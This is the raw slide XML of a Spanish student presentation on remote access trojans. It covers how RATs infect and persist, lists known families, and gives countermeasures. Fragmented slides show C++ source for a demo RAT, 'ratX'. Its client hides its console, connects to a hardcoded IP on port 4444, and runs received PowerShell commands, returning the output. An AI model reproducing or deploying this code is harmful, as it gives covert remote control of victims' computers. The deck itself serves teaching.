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  <p:embeddedFont>
      <p:font typeface="Roboto Mon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5.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-bold.fntdata"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-regular.fntdata"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-boldItalic.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMon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-italic.fntdata"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Robo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e7f0031f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e7f0031f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e7f0031ff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3e7f0031ff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e3ef059822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e3ef059822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3ef059822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e3ef059822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e3ef059822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e3ef059822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e3ef059822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e3ef059822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e3ef059822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e3ef059822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e3ef059822_2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e3ef059822_2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e3ef059822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e3ef059822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e3ef059822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e3ef059822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3c3ec9a6c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3c3ec9a6c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e3ef059822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e3ef059822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e3ef059822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e3ef059822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e3ef059822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e3ef059822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e3ef059822_2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e3ef059822_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e3ef059822_2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e3ef059822_2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e3ef059822_2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e3ef059822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e3ef059822_2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e3ef059822_2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e3ef059822_2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e3ef059822_2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e3ef059822_2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e3ef059822_2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e3ef059822_2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e3ef059822_2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3e7f0031f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3e7f003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3eb4d61dc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3eb4d61dc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3ef059822_2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3ef059822_2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e7f0031f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3e7f0031f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3e7f0031f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3e7f0031f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3e7f0031f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3e7f0031f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e7f0031f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3e7f003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e7f0031f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3e7f0031f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3e7f0031f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3e7f003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13.png"/><Relationship Id="rId6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RAT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2792162"/>
            <a:ext cx="8222100" cy="17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Presentación de malware - Seguridad informática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Abdurrahman y Francisco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7625" y="3223125"/>
            <a:ext cx="2996375" cy="166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492900" y="1219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🌐 5. Ataques DDoS (Denegación de Servicio Distribuido)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Controlar dispositivos infectados para lanzar un ataque DDoS coordinado.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Ejemplo: </a:t>
            </a:r>
            <a:r>
              <a:rPr i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Inundar un servidor con solicitudes hasta que deje de responder.</a:t>
            </a:r>
            <a:endParaRPr i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Dificultad para rastrear el origen del ataque debido a la naturaleza distribuida.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⛏ 6. Minería de criptomonedas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Usar la potencia de cómputo del dispositivo para minar criptomonedas.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atacante evita el costo de electricidad y hardware.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usuario solo notará un rendimiento más lento del dispositivo.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8136075" y="2255300"/>
            <a:ext cx="206700" cy="891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7527225" y="1723600"/>
            <a:ext cx="1424400" cy="7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Riot Games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RATs Conocidos  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="287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🐀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njRAT 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Muy utilizado en ataques dirigidos, permite control total del sistema infectado.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DarkComet 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RAT ampliamente usado en su época, aunque su desarrollo se detuvo en 2012.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QuasarRAT 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RAT de código abierto escrito en C# que aún se usa en campañas de malware.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NanoCore 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RAT modular que ha sido distribuido en campañas de phishing.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Remcos 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Comercializado como herramienta legítima, pero ampliamente usado en ataques.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Warzone RAT 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RAT avanzado con capacidades como keylogger y control remoto.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PlugX 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RAT utilizado principalmente en ataques dirigidos en Asia.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Adwind (también conocido como JSocket o AlienSpy)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RAT basado en Java que funciona en múltiples sistemas operativos.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Houdini (H-Worm)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RAT basado en VBScript que se propaga mediante correos electrónicos maliciosos.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RevengeRAT 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RAT con funciones de exfiltración de datos y control de escritorio remoto.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(servidor)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Google Shape;161;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295275" y="1229875"/>
            <a:ext cx="8010600" cy="32088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311700" y="1153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// ratX - C++ rat (para Windows 10 presentación de malware)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iostream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winsock2.h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#pragma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comment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lib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ws2_32.lib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Enlaza la librería Winsock para manejo de sockets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#define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4444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Puerto donde el servidor escuchará conexiones entrantes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#define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BUFFER_SIZE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8192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// Tamaño del buffer de datos (8KB)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// Función para inicializar Winsock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initWinsock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WSADATA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wsa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WSAStartup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MAKEWORD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&amp;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wsa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cerr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Error al inicializar Winsock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endl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exit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(servidor)</a:t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295275" y="1229875"/>
            <a:ext cx="8010600" cy="32088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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1153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initWinsock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Inicializa Winsock antes de usar sockets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SOCKET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serverSocket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clientSocket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sockaddr_in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client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clientSize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sizeof(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Crea un socket TCP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serverSocket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AF_INET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SOCK_STREAM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serverSocket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INVALID_SOCKET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cerr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Error al crear el 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endl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(servidor)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Google Shape;175;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295275" y="1229875"/>
            <a:ext cx="8010600" cy="32088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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1153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Configura la estructura del servidor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sin_family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AF_INET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sin_addr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s_addr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INADDR_ANY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Acepta conexiones de cualquier IP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sin_port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htons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Convierte el puerto a formato de red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Enlaza el socket al puerto especificado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bind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sockaddr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)&amp;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sizeof(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SOCKET_ERROR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cerr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Error al enlazar el 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endl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Pone el socket en modo de escucha para aceptar conexiones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listen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cout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[+] Esperando conexiones en el puerto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endl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C792EA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(servidor)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Google Shape;182;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295275" y="1229875"/>
            <a:ext cx="8010600" cy="32088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27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1153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Acepta una conexión entrante de un cliente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clientSocket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accept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sockaddr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)&amp;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&amp;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clientSize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clientSocket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INVALID_SOCKET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cerr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Error al aceptar conexión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endl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cout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[+] Cliente conectado!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endl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char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BUFFER_SIZE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(true)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cout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getline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cin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Lee el comando de la entrada estándar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empty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())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continue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(servidor)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Google Shape;189;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295275" y="1229875"/>
            <a:ext cx="8010600" cy="32088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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1153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// Envía el comando al cliente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c_str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fullResponse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(true)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bytesReceived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recv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sizeof(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bytesReceived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bytesReceived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\0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';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Asegura que el buffer termine en null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fullResponse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// Verifica si el mensaje contiene el delimitador de fin de respuesta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fullResponse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[END]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")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npos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fullResponse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fullResponse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substr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fullResponse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[END]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"));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Elimina el delimitador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(servidor)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Google Shape;196;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295275" y="1229875"/>
            <a:ext cx="8010600" cy="32088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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1153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cout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Respuesta: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fullResponse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&lt;&lt;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endl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Muestra la respuesta del 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cliente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Cierra los sockets y limpia Winsock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closesocket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closesocket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WSACleanup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(cliente)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Google Shape;203;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295275" y="1229875"/>
            <a:ext cx="8010600" cy="32088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3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// ratX_client - C++ rat (para Windows 10 presentación de malware)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iostream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winsock2.h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windows.h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#include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#pragma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comment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lib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ws2_32.lib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Enlaza la librería Winsock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DisableHiddedConsole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false;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// Determina si la consola debe ocultarse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#define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SERVER_IP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79.147.14.41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Dirección IP del servidor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#define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4444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Puerto donde se conectará al servidor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#define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BUFFER_SIZE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8192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Tamaño del buffer de datos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(cliente)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Google Shape;210;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295275" y="1229875"/>
            <a:ext cx="8010600" cy="31896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3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// Función para ejecutar comandos en PowerShell y capturar la salida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executeCommand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&amp;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fullCommand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powershell -Command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\"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\"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Ejecuta el comando en PowerShell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char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BUFFER_SIZE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result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FILE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pipe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_popen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fullCommand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c_str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");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Abre un pipe para leer la salida del comando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(!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pipe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Error al ejecutar el comando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fgets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sizeof(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pipe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nullptr)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result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_pclose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pipe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result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¿Qué es un Rat?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Cómo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> Funciona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Objetivos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RATs Conocidos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Documentación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Demostración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(cliente)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Google Shape;217;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295275" y="1229875"/>
            <a:ext cx="8010600" cy="31896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" name="Google Shape;218;p3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Oculta la consola si la opción está activada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(!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DisableHiddedConsole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HWND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hwnd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GetConsoleWindow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ShowWindow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hwnd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SW_HIDE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Inicializa Winsock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WSADATA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wsa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WSAStartup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MAKEWORD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&amp;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wsa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Crea un socket TCP para conectarse al servidor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SOCKET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clientSocket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AF_INET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SOCK_STREAM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sockaddr_in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sin_family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AF_INET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sin_addr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s_addr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inet_addr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SERVER_IP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sin_port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htons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(cliente)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Google Shape;224;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295275" y="1229875"/>
            <a:ext cx="8010600" cy="32088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33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1153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Intenta conectarse al servidor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connect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sockaddr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)&amp;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sizeof(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server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Si la conexión falla, el cliente termina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char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BUFFER_SIZE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(true)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C792EA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bytesReceived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recv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sizeof(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bytesReceived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Si no recibe datos, termina el bucle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bytesReceived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\0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';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Asegura que el buffer termine en null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buffer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ABED8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// Ejecuta el comando recibido y almacena la salida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s" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="FFCB6B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output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executeCommand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output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es" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="C3E88D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[END]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";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Agrega el delimitador de fin de respuesta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send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output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c_str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output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// Envía la salida al servidor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F0717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 programa (cliente)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="Google Shape;231;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295275" y="1229875"/>
            <a:ext cx="8010600" cy="3208800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="292D3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34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1153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50">
                <a:solidFill>
                  <a:srgbClr val="676E9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// Cierra el socket y limpia Winsock</a:t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closesocket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clientSocket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1050">
                <a:solidFill>
                  <a:srgbClr val="82AA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WSACleanup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" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="BABED8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050">
                <a:solidFill>
                  <a:srgbClr val="F78C6C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89DDFF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89DDFF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676E9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Compilación de ratX</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="238" name="Google Shape;23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862" y="1116850"/>
            <a:ext cx="6948274" cy="346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 funcionamiento de ratX</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="244" name="Google Shape;24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200"/>
            <a:ext cx="8839200" cy="3428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 funcionamiento de ratX</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="250" name="Google Shape;25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" y="1151150"/>
            <a:ext cx="7534275" cy="351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 funcionamiento de ratX</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="256" name="Google Shape;25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775" y="2071675"/>
            <a:ext cx="5419725" cy="100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 funcionamiento de ratX</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="262" name="Google Shape;2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" y="970175"/>
            <a:ext cx="4873692" cy="160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450" y="2638425"/>
            <a:ext cx="5156612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4675" y="970175"/>
            <a:ext cx="3907620" cy="277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9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="12633" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4839325" y="3245300"/>
            <a:ext cx="4257851" cy="10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 funcionamiento de ratX</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="271" name="Google Shape;27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650" y="1741650"/>
            <a:ext cx="6362700" cy="16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 de funcionamiento de ratX</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="277" name="Google Shape;27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08300"/>
            <a:ext cx="5879300" cy="326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5275" y="1589300"/>
            <a:ext cx="2648200" cy="2360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081925"/>
            <a:ext cx="6156592" cy="200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¿Que es un RAT?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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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RAT</a:t>
            </a:r>
            <a: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i="1"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Remote Access Trojan</a:t>
            </a:r>
            <a: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</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1"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Troyano de Acceso Remoto</a:t>
            </a:r>
            <a:r>
              <a:rPr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es un tipo de malware que permite a un atacante obtener acceso y control remoto total sobre un sistema o dispositivo infectado. El atacante puede ejecutar comandos, robar datos, instalar otros programas maliciosos o incluso espiar a través de la cámara o el micrófono sin que el usuario lo note.</a:t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4400" y="2951872"/>
            <a:ext cx="6739598" cy="193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 flipH="1" rot="10800000">
            <a:off x="1241850" y="3832125"/>
            <a:ext cx="1065900" cy="5871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828625" y="3125250"/>
            <a:ext cx="13701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Jugador de Fornite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Contramedidas</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Google Shape;285;p4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descargar software de sitios poco confiables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Configurar un FireWall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entrar en páginas raras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usar el usuario Administrador como usuario principal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Instalar un AntiVirus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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="22678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Gracias por su atención!!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Cómo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> Funciona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RAT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funciona creando una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conexión remota oculta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entre el dispositivo infectado y el atacante. El proceso básico es el siguiente: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🔎 1. Infección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RAT se introduce en el sistema a través de métodos como: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Archivos adjuntos en correos electrónicos.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Programas falsos o crackeados.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Enlaces maliciosos.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Documentos infectados (como archivos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es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.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr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.doc</a:t>
            </a:r>
            <a:r>
              <a:rPr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etc.).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Cómo Funciona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📡 2. Establecimiento de conexión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 vez ejecutado, el RAT crea una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puerta trasera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 el sistema.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conecta al servidor del atacante usando una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dirección IP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un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nombre de dominio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predefinido.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Usa protocolos comunes (como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TCP/IP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para evitar levantar sospechas.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1500" y="3038254"/>
            <a:ext cx="4452500" cy="185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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4438725" y="939625"/>
            <a:ext cx="641700" cy="684900"/>
          </a:xfrm>
          <a:prstGeom prst="leftUpArrow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5156550" y="892675"/>
            <a:ext cx="14790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Backdoor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Cómo Funciona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🖥️ 3. Control remoto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atacante obtiene control total sobre el sistema y puede:</a:t>
            </a:r>
            <a:b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Ejecutar comandos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 el sistema.</a:t>
            </a:r>
            <a:b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Registrar pulsaciones de teclas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(keylogging) para robar contraseñas o datos bancarios.</a:t>
            </a:r>
            <a:b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Robar archivos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datos personales.</a:t>
            </a:r>
            <a:b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Abrir o cerrar programas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Acceder a la cámara y el micrófono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espiar.</a:t>
            </a:r>
            <a:b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Instalar más malware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actualizar el RAT para que sea más difícil de detectar.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Cómo Funciona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🧠 4. Persistencia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RAT se oculta en el sistema para evitar ser detectado.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Puede instalarse como un </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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proceso de inicio</a:t>
            </a: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usar técnicas de rootkit para seguir activo incluso después de un reinicio.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🚨 5. Comunicación continua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RAT envía información al atacante de manera continua.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atacante puede ajustar el comportamiento del RAT o instalar otros programas maliciosos según la información obtenida.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 RAT ofrece a los hackers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control total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sobre el dispositivo infectado, lo que les permite llevar a cabo varios ataques maliciosos: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🛡️ 1. Espionaje y vigilancia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Acceder a la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cámara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al </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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micrófono</a:t>
            </a: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espiar al usuario.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Capturar capturas de pantalla y registrar las pulsaciones del teclado (keylogging).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s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Extraer datos privados (contraseñas, documentos, historial de navegación).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311700" y="2795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11700" y="887300"/>
            <a:ext cx="86835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7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🏦 2. Robo de información y chantaje</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="17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8219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Robar credenciales bancarias y datos personales.</a:t>
            </a:r>
            <a:endParaRPr sz="15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8219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Chantajear al usuario con fotos o información sensible obtenida desde el dispositivo.</a:t>
            </a:r>
            <a:endParaRPr sz="15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7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🖥️ 3. Control de infraestructuras críticas</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="17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8219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Ejemplo real: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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Ucrania (2015)</a:t>
            </a:r>
            <a:r>
              <a:rPr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Un RAT fue utilizado para tomar el control de sistemas SCADA, provocando un apagón masivo que afectó a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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80,000 personas</a:t>
            </a:r>
            <a:r>
              <a:rPr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5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8219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Riesgo de ataques a servicios públicos (agua, electricidad, telecomunicaciones).</a:t>
            </a:r>
            <a:endParaRPr sz="15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7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💾 4. Instalación de otros malwares</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="17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8219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Descargar y ejecutar ransomware, spyware o keyloggers.</a:t>
            </a:r>
            <a:endParaRPr sz="15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8219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Instalar puertas traseras (</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1"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backdoors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="15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para asegurar el acceso futuro al sistema.</a:t>
            </a:r>
            <a:endParaRPr sz="15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